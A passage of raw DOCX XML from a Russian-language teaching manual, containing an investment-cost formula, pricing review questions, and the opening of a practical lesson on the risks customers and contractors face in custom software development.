    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Инвестиционные средства – это те средства, которые требуются единовременно для того, чтобы проект мог действовать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ио можно рассчитать по формуле:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ио = Ко + Кв + Км + Ктр + Кпр(4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>где: Ко- инвестиции в основное технологическое оборудование;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Кв - инвестиции во вспомогательное оборудование;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Км - стоимость монтажа и пуско-наладки оборудования;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ктр- стоимость транспортировки оборудования;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Кпр - прочиеинвестиционные расходы, значимые для проекта (патентование, лицензирование и др.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Охарактеризуйте структуру цены.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Опишите последовательность разработки ценовой политики предприятия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Охарактеризуйте методы ценообразования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3FFC" w:rsidRPr="00617AC0" w:rsidRDefault="00DB3FFC" w:rsidP="007755F7">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="203" w:name="_Toc507788266"/>
      <w:bookmarkStart w:id="204" w:name="_Toc507788541"/>
      <w:bookmarkStart w:id="205" w:name="_Toc26278747"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практическое занятие № 40 Выбор эффективной технологии продвижения программного обеспечения на рынок информационных услуг</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203"/>
      <w:bookmarkEnd w:id="204"/>
      <w:bookmarkEnd w:id="205"/>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: формирование навыков продвижения программного обеспечения на рынок.</w:t>
      </w:r>
      <w:r w:rsidR="00E73975" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Выбор эффективной технологии продвижения программного обеспечения на рынок информационных услуг</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Оборудование</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: персональный компьютер.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00D84D30" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Особенности рынка разработки ПО под заказ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рынок разработки программного обеспечения (ПО) под заказ существенно отличается от других услуг в сфере IT. Прежде всего, это обусловлено высокой технической сложностью выполняемых работ и рисками, которые в связи с этим обычно несут как заказчик, так и исполнитель.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рассмотрим основные особенности данного рынка и по результатам анализа выделим те факторы, которые могут иметь наибольшее значение для заказчика при выборе исполнителя для заказа на разработку программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Причины обращения за разработкой ПО под заказ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Можно выделить несколько основных случаев, в которых потенциальный заказчик вместо приобретения готового программного продукта обращается в компанию, проводящую разработку программ </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>под заказ</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Для решаемой задачи не существует </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>коробочного</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ПО</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Существующее ПО не удовлетворяет всем требованиям</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Лицензия на существующее ПО слишком дорогая,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ПО требует дорогостоящих доработок или сопровождения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные риски заказчика</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E73975" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Следует отметить, что многие из потенциальных клиентов уже ранее имели опыт аутсорсинга разработки программного обеспечения и как правило, именно с ним связаны основные опасения. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рассмотрим наиболее распространенные проблемы, которые испытывает заказчик, обращаясь за услугами по разработке программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Превышение сроков разработки продукта</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При разработке программного обеспечения под заказ распространенной практикой являются ситуации, когда планируемые сроки разработки превышаются в несколько раз. При этом в результате продукт может устареть еще до окончания его разработки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Низкое качество продукта</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Зачастую разработанный под заказ программный продукт имеет крайне низкое качество и содержит много ошибок, что увеличивает период внедрения и тестирования, в итоге нередко на этапе внедрения такого продукта, оплатив все издержки его разработки, заказчик вынужден отказаться от его использования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Слабая проектная составляющая</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ошибки этапа проектирования представляют одну из наиболее серьезных проблем, возникающих при разработке программных продуктов под заказ. Как правило, при проектировании продукта используется одна из двух основных схем:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Жесткое техническое задание заказчика - проектная документация на разработку программного продукта полностью подготавливается заказчиком. Необходимо отметить, что если заказчик – не IT-компания, он может не иметь специалистов, квалификация которых достаточна для составления грамотного технического задания.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Предложения исполнителя по разработке программного продукта на основе функциональной спецификации заказчика – заказчик предоставляет исполнителю функциональную спецификацию на продукт – документ, описывающий требования только к функциональности, но не к внутренней архитектуре программного продукта. На основании функциональной спецификации исполнитель предлагает проект технического задания заказчику.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вместе с тем ни одна из перечисленных схем не лишена недостатков. Наиболее распространенная проблема – проектная документация не учитывает все работы, которые нужно выполнить, чтобы продукт имел заявленную функциональность, а как результат – сроки и бюджет проекта оказываются рассчитанными неправильно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проблемы могут возникнуть и по вине самого заказчика – составляя техническое задание, заказчик может не учесть всю функциональность, которая ему необходима. Изменение проектной документации в процессе разработки может создать дополнительные проблемы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Превышение бюджета разработки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Оплата работы программистов, как правило, производится по фиксированному времени. Таким образом, себестоимость разрабатываемого программного продукта определяется суммарным временем (в человеко-часах), которое коллектив программистов затратит на его разработку.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вместе с тем, как было сказано выше, неточности в проектной документации могут привести к увеличению сроков разработки, либо к тому, что разработанное решение не имеет функциональности, которая будет достаточной для заказчика.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В данном случае заказчик оказывается перед выбором – отказаться от дальнейшей разработки продукта и потерять все средства, которые уже были затрачены на его разработку, либо потратить еще определенное количество средств на доработку продукта и успешно ввести его в эксплуатацию. В отдельных случая запланированный бюджет в может быть превышен в несколько раз.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проблемы на этапе внедрения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Разработанный программный продукт может формально четко соответствовать проектной документации, однако иметь недостатки, как этапа проектирования, так и этапа реализации, препятствующие его использованию по назначению.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Стоимость устранения таких недостатков окажется тем выше, чем на более позднем этапе они будут выявлены. Так, например, устранение архитектурных недостатков на этапе массового внедрения и технической поддержки пользователей может привести к расходам, которые существенно превысят весь бюджет проекта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Остановка критичных бизнес-процессов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отсутствие к нужному времени программного продукта, обеспечивающего автоматизацию тех или иных бизнес-процессов, критичных для компании (например, программное обеспечение, обеспечивающее учет грузоперевозок, либо программное обеспечение для Call-центра, обеспечивающего прием и обработку тысяч звонков) может остановить процессы, которые являются критичными для одного из подразделений, либо для всей компании в целом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные риски исполнителя</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Необходимо отметить, что при разработке программных продуктов исполнитель также несет риски превышения бюджета разработки. В том случае, если стоимость услуг по разработке объявлена в договоре фиксированной (что наиболее привлекательно для заказчика), все непредвиденные расходы в случае превышения сроков и бюджета разработки ложатся на исполнителя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В случае, если установленные договором сроки фиксированные, а исполнитель не желает нести репутационные издержки, он может ускорить разработку продукта, затратив дополнительные средства и привлекая большее число программистов, либо производя аутсорсинг значительной части работ у компаний-партнеров.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В случае с крупными проектами абсолютные значения этих расходов могут быть весьма существенными для компании-исполнителя работ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
